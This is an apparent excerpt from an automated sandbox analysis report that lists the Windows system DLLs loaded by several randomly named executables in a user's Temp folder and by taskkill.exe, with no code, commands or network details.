Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Section loaded: ondemandconnroutehelper.dll
